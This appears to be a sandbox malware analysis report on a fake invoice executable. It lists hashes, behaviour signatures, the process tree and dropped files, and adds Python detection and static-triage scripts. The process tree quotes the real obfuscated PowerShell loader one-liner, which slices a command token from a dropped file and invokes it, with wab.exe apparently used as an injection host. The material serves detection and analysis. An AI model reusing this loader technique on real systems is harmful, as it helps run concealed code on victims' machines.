Analysis

  • max time kernel
    141s
  • max time network
    95s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
  • submitted
    19/08/2024, 13:26

General

  • Target

    Qoute_EXW_prices_43GJI_pdf.exe

  • Size

    713KB

  • MD5

    857be0d54f844d0b99341fcb38fd7c00

  • SHA1

    a42bb0bbde545d4a94423175a1c9ed6feca461b0

  • SHA256

    b089218dc7ac4e96a6a9bf13dc51f88d082cc15596692af64724f508719e60a0

  • SHA512

    049615cb7171e40a59f5549fedf819ef45663b9beef0f77c69e97f00f2b607db4a05b8f25f380af1d9e04f642bee293b74752d41dcae08994cdd3d3fda920ce2

  • SSDEEP

    12288:46qnCZGZwF0g7A8eYnPM0mERiFa/2XAUoChkXRkMQvfVDldLGSq4W82:OCcaD7A8pPmEU3XHJyXRcvdDNq4Wl

Score
5/10

Malware Config

Signatures

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of the victim host in order to infer its geographical location.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Qoute_EXW_prices_43GJI_pdf.exe
    "C:\Users\Admin\AppData\Local\Temp\Qoute_EXW_prices_43GJI_pdf.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:560
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle minimized " $nephelite=Get-Content 'C:\Users\Admin\AppData\Local\Temp\belizerens\Anisosepalous\dagbrkninger\Stencilling.Ass243';$Kurrajong=$nephelite.SubString(56568,3);.$Kurrajong($nephelite)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:480
      • C:\Program Files (x86)\windows mail\wab.exe
        "C:\Program Files (x86)\windows mail\wab.exe"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        PID:2384
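The process tree above is the shape a detection would key on: a document-named executable in Temp starts 32-bit PowerShell with a minimized window, the one-liner slices a three-character token out of a dropped file and dot-invokes it, and PowerShell then starts the Windows Mail binary wab.exe with no arguments. The report attributes SetThreadContext, WriteProcessMemory and MapViewOfSection to PID 480, which is consistent with that child being used as an injection target, though the report does not state what was written into it. The following is an added detection pass, not part of the sandbox report, run over process-creation records constructed from the tree; the record schema (pid, ppid, image, cmdline) and the rule names are assumptions of the example, and the benign PID 900 record is a constructed control.

```python
"""
Added example (not from the sandbox report): process-tree detection rules for
the PowerShell loader chain shown in the Processes section.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Assumed process-creation record; field names are this example's, not the sandbox's."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed from the report's process tree (PIDs, images and command lines as listed there),
# plus one constructed benign PowerShell run (PID 900) as a control.
EVENTS = [
    ProcEvent(560, 0, r"C:\Users\Admin\AppData\Local\Temp\Qoute_EXW_prices_43GJI_pdf.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\Qoute_EXW_prices_43GJI_pdf.exe"'),
    ProcEvent(480, 560, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"powershell.exe" -windowstyle minimized " $nephelite=Get-Content '
              r"'C:\Users\Admin\AppData\Local\Temp\belizerens\Anisosepalous\dagbrkninger\Stencilling.Ass243';"
              r'$Kurrajong=$nephelite.SubString(56568,3);.$Kurrajong($nephelite)"'),
    ProcEvent(2384, 480, r"C:\Program Files (x86)\windows mail\wab.exe",
              r'"C:\Program Files (x86)\windows mail\wab.exe"'),
    ProcEvent(900, 1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"powershell.exe" -File C:\Scripts\inventory.ps1'),
]

# Dot-sourcing/call operator applied to a variable: ".$name(" instead of a literal command name.
_DOT_INVOKE = re.compile(r"\.\$\w+\s*\(")
# A fixed-offset slice of a string, the way the loader carves its command token out of data.
_SUBSTRING = re.compile(r"\.SubString\(\s*\d+\s*,\s*\d+\s*\)", re.I)
# Executable whose name ends in a document-style suffix, e.g. "..._pdf.exe".
_LOOKALIKE = re.compile(r"[._-](pdf|docx?|xlsx?|jpe?g)\.(exe|scr)$", re.I)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _argless(ev: ProcEvent) -> bool:
    """True when the command line is nothing but the (optionally quoted) image path."""
    return ev.cmdline.strip().strip('"').lower() == ev.image.lower()


def detect(events) -> dict:
    """Return {pid: [rule names]} for every event that trips at least one rule."""
    by_pid = {e.pid: e for e in events}
    hits = {}
    for ev in events:
        rules = []
        name = _basename(ev.image)
        parent = by_pid.get(ev.ppid)

        # Rule 1: PowerShell reads a file, slices a token out of it and dot-invokes the token.
        if (name == "powershell.exe"
                and re.search(r"Get-Content", ev.cmdline, re.I)
                and _SUBSTRING.search(ev.cmdline)
                and _DOT_INVOKE.search(ev.cmdline)):
            rules.append("powershell_substring_invoke")

        # Rule 2: PowerShell starts a Program Files binary with no arguments at all,
        # the shape of a host process chosen for injection rather than for its own function.
        if (parent is not None
                and _basename(parent.image) == "powershell.exe"
                and ev.image.lower().startswith("c:\\program files")
                and _argless(ev)):
            rules.append("powershell_spawns_argless_program_files_binary")

        # Rule 3: document-lookalike executable running out of the user's Temp directory.
        if "\\appdata\\local\\temp\\" in ev.image.lower() and _LOOKALIKE.search(name):
            rules.append("document_lookalike_exe_in_temp")

        if rules:
            hits[ev.pid] = rules
    return hits


if __name__ == "__main__":
    for pid, rules in detect(EVENTS).items():
        print(pid, rules)
```

Rule 2 deliberately does not name wab.exe: any signed binary under Program Files launched argument-less by PowerShell deserves the same look, and the injection-related signatures the sandbox reports (SetThreadContext, WriteProcessMemory, MapViewOfSection) are API-level events that a process-creation feed cannot see, so the parent/child shape is the proxy.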

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\belizerens\Anisosepalous\dagbrkninger\Kolorimetri.She17

    Filesize

    377KB

    MD5

    2c2dd8cd3a8e9d59a9329f41de07faf5

    SHA1

    5b43e2c03f458531b56d50404cf4a6095632f296

    SHA256

    c04a936ca71dd30413ba86100ed0fa5a5ba5d73609e778a351314504137a9b15

    SHA512

    5358a19aa964dc359efebe07a871ad58bdf85e15e784d55c57da7cb74590f9e7d5da5f126a0ab6fe1e28fcc2af297fa45f98b0d019544d0a8735a60868dcae25

  • C:\Users\Admin\AppData\Local\Temp\belizerens\Anisosepalous\dagbrkninger\Stencilling.Ass243

    Filesize

    55KB

    MD5

    6d1f78dce389501cbce9c49abdb72308

    SHA1

    20d5e675fadb508978d1ca91d79f7bd96091a8ad

    SHA256

    31600f74bde7637dca69ae3c61c5abfbe2aebf84760afdf8ad410574e6d3f49f

    SHA512

    b3b7d9fae878e5a2302158a899b0620efbb63dbdb26ae3f26b2f4712192b348241126995f92fb6c11a7add82f83fd7f53971a93ba604e028205f108d2d80b431

  • memory/480-12-0x0000000074190000-0x000000007473B000-memory.dmp (5.7MB)
  • memory/480-18-0x0000000074190000-0x000000007473B000-memory.dmp (5.7MB)
  • memory/480-8-0x0000000074191000-0x0000000074192000-memory.dmp (4KB)
  • memory/480-10-0x0000000074190000-0x000000007473B000-memory.dmp (5.7MB)
  • memory/480-15-0x0000000074190000-0x000000007473B000-memory.dmp (5.7MB)
  • memory/480-16-0x0000000074190000-0x000000007473B000-memory.dmp (5.7MB)
  • memory/480-9-0x0000000074190000-0x000000007473B000-memory.dmp (5.7MB)
  • memory/480-11-0x0000000074190000-0x000000007473B000-memory.dmp (5.7MB)
  • memory/480-19-0x0000000074190000-0x000000007473B000-memory.dmp (5.7MB)
  • memory/480-20-0x0000000074190000-0x000000007473B000-memory.dmp (5.7MB)
  • memory/480-21-0x0000000074190000-0x000000007473B000-memory.dmp (5.7MB)
  • memory/480-22-0x0000000074190000-0x000000007473B000-memory.dmp (5.7MB)
  • memory/480-24-0x0000000006510000-0x000000000BFEF000-memory.dmp (90.9MB)
  • memory/2384-25-0x0000000000DF0000-0x0000000001E52000-memory.dmp (16.4MB)
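The SubString(56568,3) slice in PID 480's command line gives a useful consistency check against the dropped Stencilling.Ass243: Get-Content without -Raw returns one string per line, so the call only resolves if the file is a single line at least 56,571 characters long, which fits the 55KB size listed above. The added script below is not from the report. It parses the loader one-liner, recovers the staging path and the slice, resolves the slice against a file without invoking it, and emits a PowerShell line that prints the token instead of executing it. The real file content is not in the report, so the stage used here is a constructed stand-in with a placeholder token at the offset; the placeholder is an assumption, not the recovered value.

```python
"""
Added example (not from the sandbox report): static triage of the PowerShell
loader command line recorded for PID 480. Nothing here executes the stage.
"""
import re
from dataclasses import dataclass

# Copied from the report's process tree (PID 480).
LOADER_CMDLINE = (
    r'"powershell.exe" -windowstyle minimized " $nephelite=Get-Content '
    r"'C:\Users\Admin\AppData\Local\Temp\belizerens\Anisosepalous\dagbrkninger\Stencilling.Ass243';"
    r'$Kurrajong=$nephelite.SubString(56568,3);.$Kurrajong($nephelite)"'
)


@dataclass(frozen=True)
class LoaderSpec:
    content_var: str   # variable holding the staged file text
    stage_path: str    # file read with Get-Content
    token_var: str     # variable holding the sliced command token
    offset: int
    length: int


_GET_CONTENT = re.compile(r"\$(\w+)\s*=\s*Get-Content\s+'([^']+)'", re.I)
_SUBSTRING = re.compile(r"\$(\w+)\s*=\s*\$(\w+)\.SubString\(\s*(\d+)\s*,\s*(\d+)\s*\)", re.I)
_DOT_INVOKE = re.compile(r"\.\$(\w+)\s*\(\s*\$(\w+)\s*\)")


def parse_loader(cmdline: str) -> LoaderSpec:
    """Recover path, slice and variable flow from a Get-Content / SubString / dot-invoke one-liner."""
    gc, ss, inv = (_GET_CONTENT.search(cmdline), _SUBSTRING.search(cmdline),
                   _DOT_INVOKE.search(cmdline))
    if not (gc and ss and inv):
        raise ValueError("command line does not match the Get-Content/SubString/dot-invoke shape")
    content_var, stage_path = gc.groups()
    token_var, sliced_var, offset, length = ss.groups()
    # The token must be sliced from the file content and then invoked on that same content.
    if sliced_var != content_var or inv.group(1) != token_var or inv.group(2) != content_var:
        raise ValueError("variable flow is not content -> slice -> invoke(content)")
    return LoaderSpec(content_var, stage_path, token_var, int(offset), int(length))


def resolve_token(stage_text: str, spec: LoaderSpec) -> str:
    """Return the characters the loader would have invoked, or explain why it could not.

    Get-Content without -Raw yields one string per line; on PowerShell 2.0 (the Windows 7
    default) a multi-line result has no SubString method at all, so the stage must be one line.
    """
    lines = stage_text.splitlines()
    if len(lines) != 1:
        raise ValueError(f"stage has {len(lines)} lines; the slice would not resolve")
    line = lines[0]
    if spec.offset + spec.length > len(line):
        raise ValueError(f"stage is {len(line)} chars; slice needs {spec.offset + spec.length}")
    return line[spec.offset:spec.offset + spec.length]


def triage_cmdline(spec: LoaderSpec) -> str:
    """Rewrite the loader so it prints the token instead of invoking it (run only in an isolated VM)."""
    return (f"${spec.content_var}=Get-Content '{spec.stage_path}';"
            f"${spec.content_var}.SubString({spec.offset},{spec.length})")


def build_stub_stage(spec: LoaderSpec, token: str) -> str:
    """Constructed stand-in for Stencilling.Ass243; its real content is not in the report."""
    if len(token) != spec.length:
        raise ValueError("placeholder token must match the slice length")
    return "A" * spec.offset + token + "B" * 16


if __name__ == "__main__":
    spec = parse_loader(LOADER_CMDLINE)
    print(spec)
    print(triage_cmdline(spec))
    # "iex" is an assumed placeholder, chosen only because it has the right length.
    print(resolve_token(build_stub_stage(spec, "iex"), spec))
```

Resolving the token against a copy of the dropped file tells an analyst which command the three characters name before anything is run, and the same parser applied to a quoted command line from the process tree is a cheap triage step for any loader that avoids a literal command name by slicing it out of data.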